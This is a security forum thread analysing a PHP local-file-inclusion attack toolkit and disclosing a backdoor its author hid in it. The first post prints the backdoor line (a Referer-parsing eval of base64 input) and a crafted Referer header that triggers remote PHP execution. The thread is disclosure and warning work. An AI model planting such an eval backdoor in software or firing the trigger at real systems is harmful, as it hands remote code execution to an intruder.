Results 1 to 2 of 2
Like Tree2Likes
  • 1 Post By MaXe
  • 1 Post By Evox

Thread: Analysis of "r00t 4 LFI Toolkit"

  1. #1
    MaXe's Avatar
    MaXe is offline Founder of InterN0T
    Join Date
    Jun 2008
    Blog Entries
    Rep Power

    Analysis of "r00t 4 LFI Toolkit"

    Dear InterN0T'ers,

    Today I saw Joe McCray among others, tweet about the (new) "r00t 4 LFI Toolkit", that according to its description:
    Quote Originally Posted by PacketStorm
    This tool is a php script that assists in performing local file inclusion attacks.
    Should be able to perform local file inclusion attacks.

    After studying this tool for a brief 5 minutes, it was obvious that it was nowhere what I hoped it to be, as the tool only use one method, the "/proc/self/environ" vector (as seen here). The tool is therefore, not capable of performing "attacks", but only 1 (one), single type of LFI attack. (Note that the 'S' has been removed.) The method this tool uses, is far from new and doesn't always work either, but it's a nice trick SirGod wrote about on our forums in 2009. (This tool was released the 18th February 2012.)

    Further study of this tool reveals:
    - None of the output from the tool is sanitized, meaning the attacker using the script, can get XSS'd (and CSRF'd), if the target has changed e.g., the 'uname -a' command (which is relatively simple to do), to include JavaScript instead. If this happens the attacker may end up attacking himself or crashing, depending on the type of XSS payload.

    - The most interesting part, is on line 92, that the "developer" (KedAns-Dz), has decided to backdoor the tool.

    Analysis of the backdoor:
    By sending a HTTP request, that includes a specially crafted referer, it is possible to execute PHP code:
    Referer: a1=iz&a2=&a3=&a4=&a5=&a6=&a7=&a8=&a0=cGhwaW5mbygpOw==
    This referer will make the script execute: phpinfo();

    The code that enables the developer to use the script as a backdoor looks like the following:
    PHP Code:
    parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' && count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ""+"join(array_slice($a,count($a)-3)))));echo '</star>';} 
    It certainly took a little bit of study to trigger, but in essence here's what it do:
    1. Parse the HTTP Referer string into variable: $a ("Referer:" is not included.)
    2. If the first array value (not key / arg), is a string named: iz
    3. And if there's 9 (different) arrays, then
    4. Print out the contents of..

    This requires a bit more in-depth explanation:
    A) Evaluate the following as PHP code:
    B) Base64_decode the input:
    C) Replace " " (space) with "+" (plus), in case they occur.
    D) Use the last three array values from the HTTP referer.
    (You don't have to use all three, using the last will work fine.)

    To make it all a lot more simple:
    Referer:Array1=iz&Array2=&Array3=&Array4=&Array5=&Array6=&Array7=&Array8=&Array0=BASE64 Code that will be executed as PHP.

    Analysis of "r00t 4 LFI Toolkit"-badtools.jpg

    Shell via LFI - proc/self/environ method (step by step)!/j0emccray/status/170941195030233090!/EChavarro/status/170941489629761537
    rawshack likes this.

  2. #2
    Join Date
    Aug 2009
    Rep Power

    Re: Analysis of "r00t 4 LFI Toolkit"

    Excellent work MaXe!

    Great analysis write up.
    I wouldn't really even consider this as an assist at all. (maybe for the dev anyway)

    MaXe likes this.

    Xires: Windows has become an OS produced by Microsoft, built by PlaySkool and themed by Crayola

Similar Threads

  1. California Moves to Outlaw Online "E-Personation"
    By MaXe in forum Security News and Feeds
    Replies: 1
    Last Post: 24th August 2010, 14:51
  2. Introducing "Netsparke"r, Web Application Security Scanner
    By LeXeL in forum Hacking Tools & Utilities
    Replies: 0
    Last Post: 3rd May 2010, 21:04
  3. Two Famous "Security Experts" Get Hacked before Black Hat Conference
    By DarkS Angel in forum Security News and Feeds
    Replies: 1
    Last Post: 31st July 2009, 08:18
  4. ICANN and IANA domains hijacked by Turkish "Hackers"
    By MaXe in forum Security News and Feeds
    Replies: 3
    Last Post: 4th July 2008, 00:04


Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts